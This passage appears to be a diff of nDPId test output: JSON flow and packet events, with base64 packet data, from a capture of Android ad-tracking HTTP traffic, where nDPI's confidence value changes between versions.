00943{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2516,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":2,"flow_last_seen":1654385229413,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":419,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":419,"pkt_l4_len":385,"thread_ts_msec":1654385229413,"pkt":"nLbQ0+MztKXvZygQCABFAAGVuYkAAPgG40ASQE8ywKgCfgBQo9QvB\/xWUTDmHIAYAIZNHwAAAQEICnH6vA0Aq1gASFRUUC8xLjEgMjAwIE9LDQpDb250ZW50LVR5cGU6IHRleHQvcGxhaW47IGNoYXJzZXQ9dXRmLTgNCkNvbnRlbnQtTGVuZ3RoOiAxDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpEYXRlOiBTYXQsIDA0IEp1biAyMDIyIDIzOjI3OjA5IEdNVA0KU2VydmVyOiBuZ2lueA0KWC1DYWNoZTogTWlzcyBmcm9tIGNsb3VkZnJvbnQNClZpYTogMS4xIDllZTEwNzRiNmQ3MTc5ODM1NWM2OTVmYjI2YzIxNDUyLmNsb3VkZnJvbnQubmV0IChDbG91ZEZyb250KQ0KWC1BbXotQ2YtUG9wOiBUWEw1MC1QMg0KWC1BbXotQ2YtSWQ6IGw1MmRLamp6ZDlDOF9Pc21pX3RnMHVfSnVTMjUxV2JObG5SV0NiLWpKSDlQVldSQ25pWG14UT09DQoNCjE="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2517,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229450,"flow_last_seen":1654385229450,"flow_idle_time":7580000,"flow_min_l4_payload_len":424,"flow_max_l4_payload_len":424,"flow_tot_l4_payload_len":424,"flow_avg_l4_payload_len":424,"midstream":1,"thread_ts_msec":1654385229450,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.233.123.55","src_port":54810,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01039{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2517,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1654385229450,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":490,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":490,"pkt_l4_len":456,"thread_ts_msec":1654385229450,"pkt":"tKXvZygQnLbQ0+MzCABFAAHcEFBAAEAG14XAqAJ+Eul7N9YaAFDjQWT+MbgksIAYAfZTFQAAAQEICs\/kGG+7dfu6R0VUIC9taW50ZWdyYWwvYmVhY29uP2FkX2dyb3VwX2lkPTE0Mzg0NSZjaGFubmVsX2lkPTExNyZjcmVhdGl2ZV9pZD0yNTM2NDAmYXVjdGlvbl9pZD1mODRmNTRiZi0zMWNkLTQzZmYtYmQyNy01MjZjY2M2NDU3ZGEmb3JpZ2luPWhhZ2dsZXItbWludGVncmFsMDIxIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgMTE7IHNka19ncGhvbmVfeDg2IEJ1aWxkL1JTUjEuMjAxMDEzLjAwMTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS84My4wLjQxMDMuMTA2IE1vYmlsZSBTYWZhcmkvNTM3LjM2DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCkhvc3Q6IGltcHJlc3Npb24tZWFzdC5saWZ0b2ZmLmlvDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2517,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229450,"flow_last_seen":1654385229450,"flow_idle_time":7580000,"flow_min_l4_payload_len":424,"flow_max_l4_payload_len":424,"flow_tot_l4_payload_len":424,"flow_avg_l4_payload_len":424,"midstream":1,"thread_ts_msec":1654385229450,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.233.123.55","src_port":54810,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"impression-east.liftoff.io","url":"impression-east.liftoff.io\/mintegral\/beacon?ad_group_id=143845&channel_id=117&creative_id=253640&auction_id=f84f54bf-31cd-43ff-bd27-526ccc6457da&origin=haggler-mintegral021","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2517,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229450,"flow_last_seen":1654385229450,"flow_idle_time":7580000,"flow_min_l4_payload_len":424,"flow_max_l4_payload_len":424,"flow_tot_l4_payload_len":424,"flow_avg_l4_payload_len":424,"midstream":1,"thread_ts_msec":1654385229450,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.233.123.55","src_port":54810,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"impression-east.liftoff.io","url":"impression-east.liftoff.io\/mintegral\/beacon?ad_group_id=143845&channel_id=117&creative_id=253640&auction_id=f84f54bf-31cd-43ff-bd27-526ccc6457da&origin=haggler-mintegral021","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2518,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229460,"flow_last_seen":1654385229460,"flow_idle_time":7580000,"flow_min_l4_payload_len":694,"flow_max_l4_payload_len":694,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":694,"midstream":1,"thread_ts_msec":1654385229460,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.235.204.9","src_port":40204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01399{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2518,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1654385229460,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":760,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":760,"pkt_l4_len":726,"thread_ts_msec":1654385229460,"pkt":"tKXvZygQnLbQ0+MzCABFAALqaatAAEAGLEjAqAJ+EuvMCZ0MAFCRGad0Zg9EgYAYAfak9wAAAQEICqWNW0ubSFulR0VUIC9ldmVudC92YXN0L3N0YXJ0LzU3YWE4MENPWGpDQklrWmpnMFpqVTBZbVl0TXpGalpDMDBNMlptTFdKa01qY3ROVEkyWTJOak5qUTFOMlJoR0lDYXFvaVRNQ0IxS01pOUR6Q2lFRG9iWTI5dExuTmpaVzVsZDJGNUxtdGhibXRoYmk1dFlYSnJaWFF6UWhob1lYZHJaWEl0Y21WdVpHVnlhVzVuTFdOdmJuUnliMnhLQ21RNE1USTVZbVkxWlRSUUFsb0RSRVZWWUFKb0JISUpkWE10WldGemRDMHg0QUVCZ0FGMWtnRUNaVzZZQVFLaEFRQUFBQUFBQUxBX3FnRUlNVEk0TUhnM01qQ3lBUTFGYm5SbGNuUmhhVzV0Wlc1MHVnRWNVU0JXYVdSbGJ5MU5iM1pwWlhNZ1lXNWtJRlJXSUhObGNtbGxjOElCR1haaGMzUXROREk0TURWa016TmhOVEJoTmpJeFpERTRORFBLQVFFQjBnRUZNRFF6TVRmYUFRVjJhV1JsYnc\/cGxheWhlYWQ9W0NPTlRFTlRQTEFZSEVBRF0mc3I9MSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDExOyBzZGtfZ3Bob25lX3g4NiBCdWlsZC9SU1IxLjIwMTAxMy4wMDE7IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvODMuMC40MTAzLjEwNiBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpIb3N0OiBhZGV4cC5saWZ0b2ZmLmlvDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01362{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2518,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229460,"flow_last_seen":1654385229460,"flow_idle_time":7580000,"flow_min_l4_payload_len":694,"flow_max_l4_payload_len":694,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":694,"midstream":1,"thread_ts_msec":1654385229460,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.235.204.9","src_port":40204,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"adexp.liftoff.io","url":"adexp.liftoff.io\/event\/vast\/start\/57aa80COXjCBIkZjg0ZjU0YmYtMzFjZC00M2ZmLWJkMjctNTI2Y2NjNjQ1N2RhGICaqoiTMCB1KMi9DzCiEDobY29tLnNjZW5ld2F5Lmthbmthbi5tYXJrZXQzQhhoYXdrZXItcmVuZGVyaW5nLWNvbnRyb2xKCmQ4MTI5YmY1ZTRQAloDREVVYAJoBHIJdXMtZWFzdC0x4AEBgAF1kgECZW6YAQKhAQAAAAAAALA_qgEIMTI4MHg3MjCyAQ1FbnRlcnRhaW5tZW50ugEcUSBWaWRlby1Nb3ZpZXMgYW5kIFRWIHNlcmllc8IBGXZhc3QtNDI4MDVkMzNhNTBhNjIxZDE4NDPKAQEB0gEFMDQzMTfaAQV2aWRlbw?playhead=[CONTENTPLAYHEAD]&sr=1","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +01362{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2518,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229460,"flow_last_seen":1654385229460,"flow_idle_time":7580000,"flow_min_l4_payload_len":694,"flow_max_l4_payload_len":694,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":694,"midstream":1,"thread_ts_msec":1654385229460,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.235.204.9","src_port":40204,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"adexp.liftoff.io","url":"adexp.liftoff.io\/event\/vast\/start\/57aa80COXjCBIkZjg0ZjU0YmYtMzFjZC00M2ZmLWJkMjctNTI2Y2NjNjQ1N2RhGICaqoiTMCB1KMi9DzCiEDobY29tLnNjZW5ld2F5Lmthbmthbi5tYXJrZXQzQhhoYXdrZXItcmVuZGVyaW5nLWNvbnRyb2xKCmQ4MTI5YmY1ZTRQAloDREVVYAJoBHIJdXMtZWFzdC0x4AEBgAF1kgECZW6YAQKhAQAAAAAAALA_qgEIMTI4MHg3MjCyAQ1FbnRlcnRhaW5tZW50ugEcUSBWaWRlby1Nb3ZpZXMgYW5kIFRWIHNlcmllc8IBGXZhc3QtNDI4MDVkMzNhNTBhNjIxZDE4NDPKAQEB0gEFMDQzMTfaAQV2aWRlbw?playhead=[CONTENTPLAYHEAD]&sr=1","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2519,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":2,"flow_last_seen":1654385229557,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"thread_ts_msec":1654385229557,"pkt":"nLbQ0+MztKXvZygQCABFAAB\/zr9AAC0GLXMS6Xs3wKgCfgBQ1hoxuCSw40FmpoAYAecIEgAAAQEICrt1\/CbP5BhvSFRUUC8xLjEgMjAwIE9LDQpEYXRlOiBTYXQsIDA0IEp1biAyMDIyIDIzOjI3OjA5IEdNVA0KQ29udGVudC1MZW5ndGg6IDANCg0K"} 00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2523,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":2,"flow_last_seen":1654385229568,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"thread_ts_msec":1654385229568,"pkt":"nLbQ0+MztKXvZygQCABFAADfGY1AAC4GkHES68wJwKgCfgBQnQxmD0SBkRmqKoAYAeR\/LQAAAQEICptIXBKljVtLSFRUUC8xLjEgMjAwIE9LDQpDb250ZW50LVR5cGU6IGltYWdlL3BuZw0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNzowOSBHTVQNCkNvbnRlbnQtTGVuZ3RoOiA3MA0KDQqJUE5HDQoaCgAAAA1JSERSAAAAAQAAAAEIBgAAAB8VxIkAAAANSURBVHjaY2T4\/78eAAWEAn\/CWx4qAAAAAElFTkSuQmCC"} 02394{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2525,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":3,"flow_last_seen":1654385231913,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385231913,"pkt":"tKXvZygQnLbQ0+MzCABFAAXU7FhAAEAGNfzAqAJ+I5wsDaY6AFDzNbM3O3\/xc4AQAfUYlgAAAQEIChlnG+IPV8RmR0VUIC9jbGljaz9rPTYyOWJlYTIwYTRlNTQxMDAwMWYwMWM3eCZtcD1mVVJQRHI1dGlVU3RmN1YyZmFqTWlhdmVIVXZlREFKOTZhaVBmVTVJaUFSVGZuSElHYWw5aSUyQk1lZmJNZWZBRWVHbjNUZmFpRmZuUlBHbkVlNmp4YzZhUkFHYXhJaSUyQk1QZmRNZWklMkJld0RrZTZHbzliV1V4SWkwOTlXVVIlMkZpJTJCZWdZRktnWTc1SWhGeDglMkJGSk1MN0slMkZINUs5R2FISWluaFBmZGxlaWFsTTZheklIa1BJRyUyQmVJR25SJTJGaVVqUFdVTk1XVVJBZiUyQmVJaUI5ZWlVaiUyRmlVUlRXVWhBNmRlSURVUVFpVWxiZkFEQWZueDNpVVZQSCUyQk0yRGtpRkRuU3JIMFQ5SGFqOVduTmJEcml3RG4zTWkwVEJHYWpCREZETURBUjJpazVJNmFqTWlnTUJpZE1lNmFTSWluaDFHVWZJNjdLTUhrUHRoN1FJNjdjYmhGSDhMQXRBNmRzMEo3NXdoalEzUlV1T1JVM01mb1IxaSUyQjJLNmRzMERGbDBHVWpNaWF2ZVdvejNoYlN1SG9SMWZVVnNScmZ1SG9SMVJValRpQWxUZlpSc1JyYzNZWlIxa0J6dDRyY0JZN1FGSFpQVVlGVDAlMkJaTTBEck4wRzB6VVlGVCUyRkQlMkJ1dGhyZXVKclYlMkZEa1AzaHJLdUhvUnNSZ1NCTGtmUSUyQkZRJTJGUlVFQWlVMyUyRmZVM0JpQk0waGR6dURGNTZZYjVUUlVFQWlVMyUyRmZVM0JpQk0wTCUyQmY2TDdSMEdVdnNSZ1NCTGtmUSUyQmJ6dEpCUjFpQVJQV1VEUGlVaXNSZ3h0NG9SMWlaTTBIcmM4SFpSMWlaTTBEJTJCNVVKN1FYWTBSMWlaTTBEa0g2SjdjOVJVRUFpVTMlMkZmVTNCaUJNMGhkenVERjU2aHJEMEdVaUJHWjlGR25SQVdvek1oclFVSDVLQkhnTjBHVWlCR1o5RkduUkFXb3pNaHJRVUg1S0JIZ3h0UlVFQWlVMyUyRmZVM0JpQk0wSGdTQkxrZlFSVUVBV1VSUGZVM0JpQk0wRCUyQnhQaDdWMEdVanNScnRyUlVFTVdvekFIa2Y2aGR6dURGVjBHVVIyaW9NMERiNUJocjUlMkZEYjMwRzB6NVZUTjBXb3pCSjdjZ1JVdU9SZ3hyWTdLYlJVRTBIVVYwV296VEw3NXdMJTJCaTBHMHpYSjd0UWhnaTA2Wk0waEZ6VERraDBHMHpvV2t4QWhvMlZWMHpLNmFTSTZkZUk2ZGVPUnI1VUhkTjBHVWpBaWFSc1JyeEFoY0tVaHJRM1JVRWVmYVJGR25sTWlhMzlXb3pUREZ4VFJVRTA0Mk0wWSUyQkg2TGRRMEwlMkJ6MyUyQkZ4JTJGaDJNMEdVUnMlMkJvek1ZanglMkZoMk0wR1VjS1IwTTBKN3dVWTBSMWlvTTBKclEzJTJCRkhVUlVFZVdvenRIZGZNRGtmUSUyQmJ4UGg3VjBHVXZzUnIydEo3NUJMa2NzJTJCYnhQaDdWMEdVdnNSclFGJTJCYnhNWWNLVFJVRU1Xb3pUaDd4VEpvUjFpb00wREZ4JTJGJTJCYngzRGt6VFJVRTBEbmowNiUyQk1iNmFSYmluUmU2YVNJNmRzMFlyNVRIQlIxUjB6SzZhUiUzRCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDExOyBzZGtfZ3Bob25lX3g4NiBCdWlsZC9SU1IxLjIwMTAxMy4wMDE7IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBW"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2529,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385232006,"flow_last_seen":1654385232006,"flow_idle_time":7580000,"flow_min_l4_payload_len":559,"flow_max_l4_payload_len":559,"flow_tot_l4_payload_len":559,"flow_avg_l4_payload_len":559,"midstream":1,"thread_ts_msec":1654385232006,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.217.16.142","src_port":53416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01220{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2529,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1654385232006,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":625,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":625,"pkt_l4_len":591,"thread_ts_msec":1654385232006,"pkt":"tKXvZygQnLbQ0+MzCABFAAJjZ+1AAEAGUBrAqAJ+rNkQjtCoAFBWAxSGMjrpcIAYAfaC4wAAAQEICuWLG17z\/UGOR0VUIC9zdG9yZS9hcHBzL2RldGFpbHM\/aWQ9Y29tLmF6YXJsaXZlLmFuZHJvaWQmcmVmZXJyZXI9YWRqdXN0X2V4dGVybmFsX2NsaWNrX2lkJTNEdi4yX2cuMTQzODQ1X2EuZjg0ZjU0YmYtMzFjZC00M2ZmLWJkMjctNTI2Y2NjNjQ1N2RhX2MuMTE3X3QudWFfdS5lN2RmODcyNDdjYmNlYTEzJTI2dXRtX2NhbXBhaWduJTNEVGVzdCUyQkNhbXBhaWduJTI2dXRtX2NvbnRlbnQlM0RUZXN0JTJCU291cmNlJTJCQXBwXzEyMzQ1Njc4OSUyNnV0bV9zb3VyY2UlM0RMaWZ0b2ZmJTI2dXRtX3Rlcm0lM0RUZXN0JTJCQ3JlYXRpdmUgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgQW5kcm9pZCAxMTsgc2RrX2dwaG9uZV94ODYgQnVpbGQvUlNSMS4yMDEwMTMuMDAxOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzgzLjAuNDEwMy4xMDYgTW9iaWxlIFNhZmFyaS81MzcuMzYNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KSG9zdDogcGxheS5nb29nbGUuY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2529,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385232006,"flow_last_seen":1654385232006,"flow_idle_time":7580000,"flow_min_l4_payload_len":559,"flow_max_l4_payload_len":559,"flow_tot_l4_payload_len":559,"flow_avg_l4_payload_len":559,"midstream":1,"thread_ts_msec":1654385232006,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.217.16.142","src_port":53416,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"play.google.com","url":"play.google.com\/store\/apps\/details?id=com.azarlive.android&referrer=adjust_external_click_id%3Dv.2_g.143845_a.f84f54bf-31cd-43ff-bd27-526ccc6457da_c.117_t.ua_u.e7df87247cbcea13%26utm_campaign%3DTest%2BCampaign%26utm_content%3DTest%2BSource%2BApp_123456789%26utm_source%3DLiftoff%26utm_term%3DTest%2BCreative","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2529,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385232006,"flow_last_seen":1654385232006,"flow_idle_time":7580000,"flow_min_l4_payload_len":559,"flow_max_l4_payload_len":559,"flow_tot_l4_payload_len":559,"flow_avg_l4_payload_len":559,"midstream":1,"thread_ts_msec":1654385232006,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.217.16.142","src_port":53416,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"play.google.com","url":"play.google.com\/store\/apps\/details?id=com.azarlive.android&referrer=adjust_external_click_id%3Dv.2_g.143845_a.f84f54bf-31cd-43ff-bd27-526ccc6457da_c.117_t.ua_u.e7df87247cbcea13%26utm_campaign%3DTest%2BCampaign%26utm_content%3DTest%2BSource%2BApp_123456789%26utm_source%3DLiftoff%26utm_term%3DTest%2BCreative","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2530,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385232040,"flow_last_seen":1654385232040,"flow_idle_time":7580000,"flow_min_l4_payload_len":927,"flow_max_l4_payload_len":927,"flow_tot_l4_payload_len":927,"flow_avg_l4_payload_len":927,"midstream":1,"thread_ts_msec":1654385232040,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.122.190.70","src_port":33042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2530,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1654385232040,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":993,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":993,"pkt_l4_len":959,"thread_ts_msec":1654385232040,"pkt":"tKXvZygQnLbQ0+MzCABFAAPTG5ZAAEAGlqjAqAJ+A3q+RoESAFCRX\/9zk9FXV4AYAfaIrAAAAQEICpYlZ45PQpgXR0VUIC92MS9jYW1wYWlnbl9jbGljay9kZGZXYlgtY19acElGXzN3RS1YZ0pTd1JKUG5fNU9wUzlJUjZYNFhHOTFYUUw2c3NSTFY0UVBMU0VRZ1d5UmJQX09BSFhHcC0zejh6S3hkUmpMLUJUNmg3ejQ2ejRxbUFXeFI1RGJvRWhyMUR5dFk0VzVnZlFMVWNWNnlFM1BPUjdQclFsclZiVnRILTd1VzFvaWUtamtSNG5hR0hUVlZIS3Y1a0ZYQko5eVRJWC1KbmdhRTJNTVRFUjFIdUJ4OXFUbHlMaGlaQ3RXU1VTdjRaZTV6NFF1R3FqV2lqRDBRQmdBbzAwV3RqNFZxUXlwekNob19wLVV6T3JWRjh3WDlMbXlzb1ozMjAyeHQtMVJsbUJOWGRkSF9pX2V2TzV5WkdwT3ZHOGt0ZGlLZmhHN2NkZFpUUjZvNWx5UjE1d1ktU0pUU00zZmZyNGRzcFZTRng2WGRuWGdmVXR4WTgwc3BJOXRtRk1oVDk3S1NDNGNNa1J2LUF5TkxXaERhRDMzV0NwVTdITi1WblR1TTB6bDRXUU1uYS1BVkJrMUhvMHZoVHo1WkJVMzJPaFRmOXVBa0dOeHVOajV3NUlmZzFHbk13WnhLaXM4SjNaNlo1bXRjN2dpcmUwZVFlRFE3ZWh0Q01GTHMwTTFhWEdFOG1IaG9BTmdfdzBBaHg0M011N3p2RFhTQ3RoSDhENFFoSGFXb1JTdUdVZ2ZCRFlMenJEOExYejZxSElMb1FOamo4aWVSQkxmSDIyVWV3VkxnTUY3ZHFoWGdsNzNWcWdVMV9jdS1HSWZzYkJtOTB6aGZkOWVvbzhyUWZkSkYyeGN6cXZyUXo2LUk0RkE\/dmFzdF9lbD0xIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgMTE7IHNka19ncGhvbmVfeDg2IEJ1aWxkL1JTUjEuMjAxMDEzLjAwMTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS84My4wLjQxMDMuMTA2IE1vYmlsZSBTYWZhcmkvNTM3LjM2DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCkhvc3Q6IGNsaWNrLmxpZnRvZmYuaW8NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01594{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2530,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385232040,"flow_last_seen":1654385232040,"flow_idle_time":7580000,"flow_min_l4_payload_len":927,"flow_max_l4_payload_len":927,"flow_tot_l4_payload_len":927,"flow_avg_l4_payload_len":927,"midstream":1,"thread_ts_msec":1654385232040,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.122.190.70","src_port":33042,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": 